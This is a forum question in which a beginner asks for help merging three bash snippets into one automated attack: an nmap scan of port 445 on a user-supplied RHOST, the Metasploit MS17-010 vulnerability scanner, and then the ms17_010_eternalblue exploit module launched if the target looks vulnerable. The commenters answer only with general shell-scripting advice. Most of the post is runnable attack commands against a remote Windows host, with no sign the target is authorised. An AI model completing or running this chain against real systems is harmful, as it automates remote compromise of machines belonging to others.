# assistance required for a beginner in bash script , combing 3 scripts into 1 , nmap +msfconsole

Tags: bash, nmap

edited - thaks for the reply , i changed the question and since the code was a mess i split it to 3 segmants which are working separately and easy to understand .
please if somebody can put all the codes together , i wrote the answers that are required to proceed to second and then third stage. the second & third stage after msfconsole is "-q -t" because its a console.

```sh
#!/bin/bash
read -p 'LHOST= ' lhost
read -p 'RHOST= ' rhost
nmap -Pn $rhost -p 445
```

if the answer is "host is up" then we can proceed

```sh
#!/bin/bash
msfconsole -q -x " use auxiliary/scanner/smb/smb_ms17_010; set rhost $rhost; run; "
```

if the answer is "Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)"
we can proceed to the last task

```sh
#!/bin/bash
msfconsole -q -x " use exploit/windows/smb/ms17_010_eternalblue; set rhost $rhost; run; "
```

im sorry in advance if the question is noobish , couldnt find something similar on the web

Comment: Please take the [tour], read [ask] and [mcve].  You should edit your question and format your code so we can read it.  Also, put your code in https://www.shellcheck.net/ to see syntax issues.

Comment: The result of `nmap` is discarded. The variable `NMAP` does not look to be initialized. It appears you want to write the output of `nmap` to a `tmpfile` so you can then `grep` with both conditions. You can use a `if grep -q 'Host is up' tmpfile; then .. fi` to check if `'Host is up'` appears in the file and then verify the file does not contain `'closed'` with a nested `if ! grep -q 'closed' tmpfile; then ... fi` (or something similar)

Comment: thank you for your time, i have read your suggestions and also changed the post , hopefully its more simple now